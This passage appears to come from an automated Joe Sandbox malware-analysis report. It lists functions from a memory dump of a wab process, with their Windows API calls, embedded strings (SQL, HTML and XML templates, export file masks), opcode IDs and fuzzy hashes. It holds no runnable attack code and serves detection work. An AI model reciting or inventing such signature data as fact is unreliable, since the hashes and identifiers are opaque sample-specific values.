                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memcpy
                                                                                                                                                                                          • String ID: $, $CREATE TABLE $h\E$h\E$t\El\E
                                                                                                                                                                                          • API String ID: 3510742995-2446657581
                                                                                                                                                                                          • Opcode ID: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                                                                                                                                                                          • Instruction ID: 6ffa86bec377aa4089670d2183b3ec09711c7f982517375fcd2495ffcd0e8f65
                                                                                                                                                                                          • Opcode Fuzzy Hash: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                                                                                                                                                                          • Instruction Fuzzy Hash: CE51CF71D00219DFCB10CF99C490AAEB7F5EF89319F21925BD841AB206D738AE45CF98
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00405A0E Relevance: 10.6, APIs: 7, Instructions: 125windowCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetDlgItem.USER32(?,000003E9), ref: 00405A25
                                                                                                                                                                                          • SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 00405A3E
                                                                                                                                                                                          • SendMessageW.USER32(?,00001036,00000000,00000026), ref: 00405A4B
                                                                                                                                                                                          • SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00405A57
                                                                                                                                                                                          • memset.MSVCRT ref: 00405ABB
                                                                                                                                                                                          • SendMessageW.USER32(?,0000105F,?,?), ref: 00405AF0
                                                                                                                                                                                          • SetFocus.USER32(?), ref: 00405B76
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: MessageSend$FocusItemmemset
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 4281309102-0
                                                                                                                                                                                          • Opcode ID: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
                                                                                                                                                                                          • Instruction ID: 6f3680249e95162a2c17081b35fa045d6cf646e1ea5253f38cdaf521fbeb1c86
                                                                                                                                                                                          • Opcode Fuzzy Hash: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
                                                                                                                                                                                          • Instruction Fuzzy Hash: 86414B75900219BBDB20DF95CC85EAFBFB8FF04754F10406AF508A6291D3759A90CFA4
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040FA33 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 103COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _snwprintfwcscat
                                                                                                                                                                                          • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                                                                                                                                          • API String ID: 384018552-4153097237
                                                                                                                                                                                          • Opcode ID: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
                                                                                                                                                                                          • Instruction ID: 690b9c6e7bf42a1b777b65718bd5b5c6a61f2cd8039d9a9c88f4ff4500a270e2
                                                                                                                                                                                          • Opcode Fuzzy Hash: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
                                                                                                                                                                                          • Instruction Fuzzy Hash: D8319E31A00209AFDF14AF55CC86AAE7BB5FF45320F10007AE804AB292D775AE49DB94
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040D7A7 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 79windowCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ItemMenu$CountInfomemsetwcschr
                                                                                                                                                                                          • String ID: 0$6
                                                                                                                                                                                          • API String ID: 2029023288-3849865405
                                                                                                                                                                                          • Opcode ID: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                                                                                                                                                                                          • Instruction ID: 35075b9e4b0179943f9cc9fcb0392e174ec026107191ec1d659f896637aaeb19
                                                                                                                                                                                          • Opcode Fuzzy Hash: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                                                                                                                                                                                          • Instruction Fuzzy Hash: A321AB32905300ABD720AF91DC8599FB7B8FB85754F000A3FF954A2280E779D944CB9A
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040541F Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 78COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
                                                                                                                                                                                          • memset.MSVCRT ref: 00405455
                                                                                                                                                                                          • memset.MSVCRT ref: 0040546C
                                                                                                                                                                                          • memset.MSVCRT ref: 00405483
                                                                                                                                                                                          • memcpy.MSVCRT ref: 00405498
                                                                                                                                                                                          • memcpy.MSVCRT ref: 004054AD
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memset$memcpy$ErrorLast
                                                                                                                                                                                          • String ID: 6$\
                                                                                                                                                                                          • API String ID: 404372293-1284684873
                                                                                                                                                                                          • Opcode ID: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                                                                                                                                                                          • Instruction ID: af38dfd20ac5a94c77b7ead9800c7a3089711b207e9f3183cf3669ed78e53beb
                                                                                                                                                                                          • Opcode Fuzzy Hash: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                                                                                                                                                                          • Instruction Fuzzy Hash: 572141B280112CBBDF11AF99DC45EDF7BACDF15304F0080A6B509E2156E6398B988F65
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040A06C Relevance: 10.6, APIs: 7, Instructions: 63timeCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                                                                                                                                                                                          • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
                                                                                                                                                                                          • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                                                                                                                                                                                          • wcscpy.MSVCRT ref: 0040A0D9
                                                                                                                                                                                          • wcscat.MSVCRT ref: 0040A0E6
                                                                                                                                                                                          • wcscat.MSVCRT ref: 0040A0F5
                                                                                                                                                                                          • wcscpy.MSVCRT ref: 0040A107
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1331804452-0
                                                                                                                                                                                          • Opcode ID: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                                                                                                                                                          • Instruction ID: 70f18838178cd2dbc623065d80ced1a8b0c5b1489d8a310e1ceaee9f81d034e1
                                                                                                                                                                                          • Opcode Fuzzy Hash: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                                                                                                                                                          • Instruction Fuzzy Hash: 321191B284011DBFEB10AF95DC45DEF777CEB01745F104076B904B6091E6399E858B7A
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00404363 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 59libraryloaderCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 0040440C: FreeLibrary.KERNEL32(?,0040436D,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404414
                                                                                                                                                                                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                                                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                                                                                                                                          • String ID: advapi32.dll
                                                                                                                                                                                          • API String ID: 2012295524-4050573280
                                                                                                                                                                                          • Opcode ID: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                                                                                                                                                                                          • Instruction ID: 6b6c0a27b71384d3bff991c3c7ca7c9b0301c8735f49a3ee57333cb8f9a5f734
                                                                                                                                                                                          • Opcode Fuzzy Hash: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                                                                                                                                                                                          • Instruction Fuzzy Hash: 5F119470440700DDE6307F62EC0AF2777A4DF80714F104A3FE541565E1DBB8A8519AAD
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00410030 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 54COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • <%s>, xrefs: 004100A6
                                                                                                                                                                                          • <?xml version="1.0" ?>, xrefs: 0041007C
                                                                                                                                                                                          • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memset$_snwprintf
                                                                                                                                                                                          • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                                                                                                                                          • API String ID: 3473751417-2880344631
                                                                                                                                                                                          • Opcode ID: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                                                                                                                                                          • Instruction ID: 2862698e7f89dc449948c814091faf4507903f68b21858a7dbdf66e33a92e1a6
                                                                                                                                                                                          • Opcode Fuzzy Hash: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                                                                                                                                                          • Instruction Fuzzy Hash: F501C8F2E402197BD720AA559C41FEAB6ACEF48345F0040B7B608B3151D6389F494B99
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040A178 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: wcscat$_snwprintfmemset
                                                                                                                                                                                          • String ID: %2.2X
                                                                                                                                                                                          • API String ID: 2521778956-791839006
                                                                                                                                                                                          • Opcode ID: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                                                                                                                                                          • Instruction ID: 672bbb69153a15f1984629f72f86def8939f314c78adde6f8276b735d3b02408
                                                                                                                                                                                          • Opcode Fuzzy Hash: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                                                                                                                                                          • Instruction Fuzzy Hash: 2101D472A403297AF7206756AC46BBA33ACAB41714F11407BFC14AA1C2EA7C9A54469A
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040D5D6 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 26COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _snwprintfwcscpy
                                                                                                                                                                                          • String ID: dialog_%d$general$menu_%d$strings
                                                                                                                                                                                          • API String ID: 999028693-502967061
                                                                                                                                                                                          • Opcode ID: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                                                                                                                                                                          • Instruction ID: 4b5f4d23dee208ad245a1fa3262b8d520e9fbefe09054bf07968a47f6ed58b46
                                                                                                                                                                                          • Opcode Fuzzy Hash: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                                                                                                                                                                          • Instruction Fuzzy Hash: 1AE04FB5E8870035E92519A10C03B2A155086A6B5BF740C2BFD0AB11D2E47F955DA40F
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00408D96 Relevance: 10.2, APIs: 8, Instructions: 159stringCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memcpy$memsetstrlen
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2350177629-0
                                                                                                                                                                                          • Opcode ID: b0fd6244f294145fe9a6ea4e3d429f9bbf97f6839acfbc1745acf2347c5e71ea
                                                                                                                                                                                          • Instruction ID: 5f65aa9fdfa02acdbc3988aed820739efb0bf546d233f5e01752542f466a415e
                                                                                                                                                                                          • Opcode Fuzzy Hash: b0fd6244f294145fe9a6ea4e3d429f9bbf97f6839acfbc1745acf2347c5e71ea
                                                                                                                                                                                          • Instruction Fuzzy Hash: 3951017290050DBEEB51DAE8CC45FEFBBBCAB09304F004476F709E6155E6349B498BA6
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0042ADCD Relevance: 9.2, APIs: 1, Strings: 5, Instructions: 217COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memset
                                                                                                                                                                                          • String ID: 8$GROUP$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                                                                                                                                                                                          • API String ID: 2221118986-1606337402
                                                                                                                                                                                          • Opcode ID: 10415b1a1c8003ecd0031fb780f2e77066144490245ccd4b04bba77302a40a65
                                                                                                                                                                                          • Instruction ID: 7aef5b05df8cb417835a49add62511a3dd126d480fa81acd131143259a3eb597
                                                                                                                                                                                          • Opcode Fuzzy Hash: 10415b1a1c8003ecd0031fb780f2e77066144490245ccd4b04bba77302a40a65
                                                                                                                                                                                          • Instruction Fuzzy Hash: 5D818A706083219FDB10CF25E48162BB7E1EF84318F96885EEC949B256D738EC55CB9B
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00408F2F Relevance: 9.1, APIs: 6, Instructions: 119COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memcmpmemset$_mbscpymemcpystrlen
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 265355444-0
                                                                                                                                                                                          • Opcode ID: a83a1467d2796da51f33b336eeec327ded5aa3ca15fd709dc7ec48effe5a66b1
                                                                                                                                                                                          • Instruction ID: d0ac777748d33e6673793c59e161d6f76d61048b6b1b65ce46f59eb5e56095ce
                                                                                                                                                                                          • Opcode Fuzzy Hash: a83a1467d2796da51f33b336eeec327ded5aa3ca15fd709dc7ec48effe5a66b1
                                                                                                                                                                                          • Instruction Fuzzy Hash: E241677190060CBEEB21DAA0DC45FDFB7BCAF04344F00443EF655E6182E675AA498BA5
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040C3C3 Relevance: 9.1, APIs: 6, Instructions: 109registryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1AE
                                                                                                                                                                                            • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1B6
                                                                                                                                                                                            • Part of subcall function 00414592: RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                                                                                                                                            • Part of subcall function 0040A9CE: ??3@YAXPAX@Z.MSVCRT ref: 0040A9DD
                                                                                                                                                                                          • memset.MSVCRT ref: 0040C439
                                                                                                                                                                                          • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                                                                                                                          • _wcsupr.MSVCRT ref: 0040C481
                                                                                                                                                                                            • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                                                                            • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                                                                                                                                                                            • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                                                                                                                                                                            • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                                                                                                                                                                                          • memset.MSVCRT ref: 0040C4D0
                                                                                                                                                                                          • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,?), ref: 0040C508
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ??3@$EnumValuememset$CloseOpen_wcsuprmemcpywcslen
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1973883786-0
                                                                                                                                                                                          • Opcode ID: 43de9e52db830488c7ebdb2928a6c49d702693ce72869a855233a6d80c0cc9be
                                                                                                                                                                                          • Instruction ID: d2440758a7fd93b52fc88bd6111275bc9aa4df1ffeb01c53d5483546710cd2f3
                                                                                                                                                                                          • Opcode Fuzzy Hash: 43de9e52db830488c7ebdb2928a6c49d702693ce72869a855233a6d80c0cc9be
                                                                                                                                                                                          • Instruction Fuzzy Hash: A4411CB2900219BBDB00EF95DC85EEFB7BCAF48304F10417AB505F6191D7749A44CBA5
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004116DD Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 82COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • memset.MSVCRT ref: 004116FF
                                                                                                                                                                                            • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                                                                                            • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                                                                                            • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                                                                                                                                                                                            • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                                                            • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                                                            • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                                                                                            • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                                                                                                                                            • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                                                                                                            • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                                                                                                                                            • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4D2
                                                                                                                                                                                            • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                                                                                                                                            • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4F3
                                                                                                                                                                                            • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                                                                                                                                          • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                                                                                                                                          • API String ID: 2618321458-3614832568
                                                                                                                                                                                          • Opcode ID: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                                                                                                                                                                          • Instruction ID: 2af34abd3473d77be096866f654b5876edf67c2d942e61680e34910f62553c8c
                                                                                                                                                                                          • Opcode Fuzzy Hash: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                                                                                                                                                                          • Instruction Fuzzy Hash: 71310DB1D013589BDB10EFA9DC816DDBBB4FB08345F10407BE548BB282DB385A468F99
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004185CA Relevance: 9.1, APIs: 6, Instructions: 78COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • memset.MSVCRT ref: 004185FC
                                                                                                                                                                                          • GetFileAttributesExW.KERNEL32(00000000,00000000,?), ref: 0041860A
                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 00418650
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ??3@AttributesFilememset
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 776155459-0
                                                                                                                                                                                          • Opcode ID: 0f4d7603f8fb496cf733ea50d928d497895b02188797bdb70aeae8633e108f7d
                                                                                                                                                                                          • Instruction ID: e31a4ad29e7632976921f0390f19c15604a95804a640e9d04457ce0419b5f72c
                                                                                                                                                                                          • Opcode Fuzzy Hash: 0f4d7603f8fb496cf733ea50d928d497895b02188797bdb70aeae8633e108f7d
                                                                                                                                                                                          • Instruction Fuzzy Hash: 1211E632A04115EFDB209FA49DC59FF73A8EB45318B21013FF911E2280DF789D8196AE
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004174F5 Relevance: 9.1, APIs: 6, Instructions: 61COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • AreFileApisANSI.KERNEL32 ref: 004174FC
                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
                                                                                                                                                                                          • malloc.MSVCRT ref: 00417524
                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 00417544
                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 00417562
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ??3@ByteCharMultiWide$ApisFilemalloc
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2308052813-0
                                                                                                                                                                                          • Opcode ID: 6248b2b7f6a479c554c71b0c61ae383c8a643aca280bf9f33ef5fcf46466946d
                                                                                                                                                                                          • Instruction ID: 8d188238c5fd2fb6163cec5331830b967abe0ebba74b79ef9884251e0929a2bc
